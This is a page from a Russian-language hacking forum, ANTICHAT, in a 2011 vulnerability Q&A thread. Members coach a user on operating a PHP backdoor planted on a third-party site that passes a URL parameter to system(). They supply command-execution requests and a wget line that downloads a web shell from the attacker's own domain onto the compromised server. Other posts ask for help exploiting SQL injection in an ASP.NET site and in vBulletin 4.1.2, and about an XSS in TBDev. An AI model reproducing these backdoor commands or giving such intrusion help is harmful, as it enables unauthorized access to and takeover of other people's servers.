HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1773 из 2438 « Первая < 7731273167317231763 1769 1770 1771 1772 1773 1774 1775 1776 1777 1783182318732273 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #17721  
Старый 27.07.2011, 17:58
semafor
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию
Подскажите плиз как с бекдором работать. Допустим по адресу site.ru/logs/logs.php внедрен код:

Цитата:
Сообщение от None  
if ($_GET['op']){system($_GET['cmd']);
die ('Work');}
Я к нему обращаюсь: site.ru/logs/logs.php?op=1 получаю в ответ Work, значит все на месте.

А как дальше? Что и где выполнять?
 
Ответить с цитированием

  #17722  
Старый 27.07.2011, 19:00
kroŧ
Новичок
Регистрация: 19.05.2010
Сообщений: 6
Провел на форуме:
7830

Репутация: 4
По умолчанию
semafor

Можно почитать справку по функции

http://ru.php.net/manual/ru/function.system.php

> Функция system (). Вызывает команду операционной системы, выводит результат выполнения на экран и возвращает последнюю строку вывода.
 
Ответить с цитированием

  #17723  
Старый 27.07.2011, 19:07
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от semafor  
semafor said:
Подскажите плиз как с бекдором работать. Допустим по адресу site.ru/logs/logs.php внедрен код:
Я к нему обращаюсь: site.ru/logs/logs.php?op=1 получаю в ответ Work, значит все на месте.
А как дальше? Что и где выполнять?
site.ru/logs/logs.php?op=1&cmd=ls
 
Ответить с цитированием

  #17724  
Старый 27.07.2011, 19:31
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию
Цитата:
Сообщение от semafor  
semafor said:
Подскажите плиз как с бекдором работать. Допустим по адресу site.ru/logs/logs.php внедрен код:
Я к нему обращаюсь: site.ru/logs/logs.php?op=1 получаю в ответ Work, значит все на месте.
А как дальше? Что и где выполнять?
site.ru/logs/logs.php?op=1&cmd=[системная команда]

Например:

site.ru/logs/logs.php?op=1&cmd=ls -la
 
Ответить с цитированием

  #17725  
Старый 27.07.2011, 20:37
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию
Цитата:
Сообщение от alexvrn  
alexvrn said:
An error has occurred: Incorrect syntax near '''. Expected ')'. SQLSTATE=42000
как можно раскрутить?
Тот же вопрос..

P.S Судя по всему, ASP.NET
 
Ответить с цитированием

  #17726  
Старый 27.07.2011, 21:34
semafor
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от h00lyshit!  
h00lyshit! said:
site.ru/logs/logs.php?op=1&cmd=
[системная команда]
Например:
site.ru/logs/logs.php?op=1&cmd=ls -la
так я вижу содержание каталога logs. А как залить туда шелл? Пробую

site.ru/logs/logs.php?op=1&cmd=http://moy_domen.ru/readme.txt>1.php

я на хост залил шелл и переименовал его в readme.txt

Но так ничего не выходит. Что неправильно делаю?
 
Ответить с цитированием

  #17727  
Старый 27.07.2011, 22:00
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию
Цитата:
Сообщение от semafor  
semafor said:
так я вижу содержание каталога logs. А как залить туда шелл? Пробую
site.ru/logs/logs.php?op=1&cmd=http://moy_domen.ru/readme.txt>1.php
я на хост залил шелл и переименовал его в readme.txt
Но так ничего не выходит. Что неправильно делаю?
site.ru/logs/logs.php?op=1&cmd=wget http://moy_domen.ru/readme.txt -O shell.php
 
Ответить с цитированием

  #17728  
Старый 28.07.2011, 06:13
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от alexvrn  
alexvrn said:
Код:
Code:
An error has occurred: Incorrect syntax near '''. Expected ')'. SQLSTATE=42000
Помогите срочно
Как обычно, закончив этот запрос и добавив злоумышленный код. Но тут ясновидцев нет, ссылку?
 
Ответить с цитированием

  #17729  
Старый 28.07.2011, 08:39
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585

Репутация: 0
По умолчанию
при попытке сделать sql inj в vBulletin 4.1.2(форум с капчей), когда посылаю любой запрос(допустим на таблицы), вылезает что я неправильно ввел капчу, хотя при указании запроса в строку

Код:
Code:
descending&humanverify%5Binput%5D=число
вписываю правильный ответ
 
Ответить с цитированием

  #17730  
Старый 28.07.2011, 11:32
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию
на трекерном движке TBDev v2.0 Yuna Scatari Edition есть юзвер в таблице пользователей, при клике на него происходит алерт javascript: alert('надпись!'); это можно как то использовать в своих мерах?
 
Ответить с цитированием
Ответ
Страница 1773 из 2438 « Первая < 7731273167317231763 1769 1770 1771 1772 1773 1774 1775 1776 1777 1783182318732273 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ